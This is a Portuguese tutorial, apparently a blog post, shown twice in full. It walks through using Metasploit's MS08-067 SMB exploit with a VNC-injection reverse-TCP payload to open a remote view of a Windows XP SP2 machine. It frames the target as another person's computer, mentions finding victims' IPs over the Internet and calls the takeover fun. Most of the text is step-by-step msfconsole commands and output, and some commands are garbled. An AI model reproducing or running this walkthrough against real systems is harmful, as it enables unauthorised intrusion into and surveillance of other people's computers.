Só vou falar aqui o que tem em tantos outros site e até mesmo no YouTube. Vou simular um teste de invasão ao Windows XP SP2, usando o Linux, com o framework Metasploit.
Metasploit: É um framework para desenvolvimento e testes de Exploit, ele tem ferramentas para coleta de informações, e testes de penetração.
Para quem não sabe exploit é um programa, que se aproveita das vulnerabilidades de um sistema computacional, como o próprio Sistema Operacional ou serviços de integração de protocolos, como FTP, HTTP e qualquer outro serviço de rede.
Para fazer esse teste você precisa de ter o Metasploit instalado, se você usa Windows, segue aquele padrão Next Next Finish, mas se esta no Linux, Leia isso, além disso instale um Cliente VNC, recomendo o vncviewer, depois de ter todos as ferramentas ai, vamos a pratica.
A primeira coisa a fazer é ter o IP da pessoa, se a pessoa estiver na sua rede é fácil, passe um scanner e pronto, mas se estiver através da Internet vai precisar fazer melhor, mas não vou abortar essa parte, na Internet tem muita coisa falando sobre isso.
Bom, eu só testei essa técnica com o XP SP2, mas se quiserem se arriscar em outros, fiquem a vontade.
Agora, a primeira coisa a fazer é abrir o msfconsole, no Linux só digitar no terminal, msfconsole mesmo. No Windows tem um Ícone no Desktop.
Entendendo como está aqui.
Estou usando o Linux Ubuntu, com as ferramentas já instaladas, o meu IP é: 192.168.2.100, o IP da minha maquina alvo é: 192.168.2.101
O terminal deve estar assim:
msf >
Digitem show exlpoits, e copie esse item.
windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption
agora digite:
use windows/smb/ms08_067_netapi
agora digite: show payloads
Selecione esse item windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
feito isso aplique o comando:
set PAYLOAD windows/vncinject/reverse_tcp
agora ficou facil,
show options
set RHOST 192.168.2.101 ( Ou o ip da maquina alvo)
set LHOST 192.168.2.100 ( Seu IP )
set TARGET 0 ( com isso ele não precisa especificar o SO )
Basicamente ficaria assim:
msf > windows/smb/use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > use windows/vncinject/revset RHOST 192.168.2.101
RHOST => 192.168.2.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.2.100
LHOST => 192.168.2.100
msf exploit(ms08_067_netapi) > set TAGET 0
TAGET => 0
Se fez tudo isso, digite o comando.
exploit
deve demorar um porco e abrir um tela do computador da pessoa.
Agora só diversão :p
Ótimo video mostrando como funciona.
Se quiserem mais detalhes clique aqui.
Metasploit: É um framework para desenvolvimento e testes de Exploit, ele tem ferramentas para coleta de informações, e testes de penetração.
Para quem não sabe exploit é um programa, que se aproveita das vulnerabilidades de um sistema computacional, como o próprio Sistema Operacional ou serviços de integração de protocolos, como FTP, HTTP e qualquer outro serviço de rede.
Para fazer esse teste você precisa de ter o Metasploit instalado, se você usa Windows, segue aquele padrão Next Next Finish, mas se esta no Linux, Leia isso, além disso instale um Cliente VNC, recomendo o vncviewer, depois de ter todos as ferramentas ai, vamos a pratica.
A primeira coisa a fazer é ter o IP da pessoa, se a pessoa estiver na sua rede é fácil, passe um scanner e pronto, mas se estiver através da Internet vai precisar fazer melhor, mas não vou abortar essa parte, na Internet tem muita coisa falando sobre isso.
Bom, eu só testei essa técnica com o XP SP2, mas se quiserem se arriscar em outros, fiquem a vontade.
Agora, a primeira coisa a fazer é abrir o msfconsole, no Linux só digitar no terminal, msfconsole mesmo. No Windows tem um Ícone no Desktop.
Entendendo como está aqui.
Estou usando o Linux Ubuntu, com as ferramentas já instaladas, o meu IP é: 192.168.2.100, o IP da minha maquina alvo é: 192.168.2.101
O terminal deve estar assim:
msf >
Digitem show exlpoits, e copie esse item.
windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption
agora digite:
use windows/smb/ms08_067_netapi
agora digite: show payloads
Selecione esse item windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
feito isso aplique o comando:
set PAYLOAD windows/vncinject/reverse_tcp
agora ficou facil,
show options
set RHOST 192.168.2.101 ( Ou o ip da maquina alvo)
set LHOST 192.168.2.100 ( Seu IP )
set TARGET 0 ( com isso ele não precisa especificar o SO )
Basicamente ficaria assim:
msf > windows/smb/use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > use windows/vncinject/revset RHOST 192.168.2.101
RHOST => 192.168.2.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.2.100
LHOST => 192.168.2.100
msf exploit(ms08_067_netapi) > set TAGET 0
TAGET => 0
Se fez tudo isso, digite o comando.
exploit
deve demorar um porco e abrir um tela do computador da pessoa.
Agora só diversão :p
Ótimo video mostrando como funciona.
Se quiserem mais detalhes clique aqui.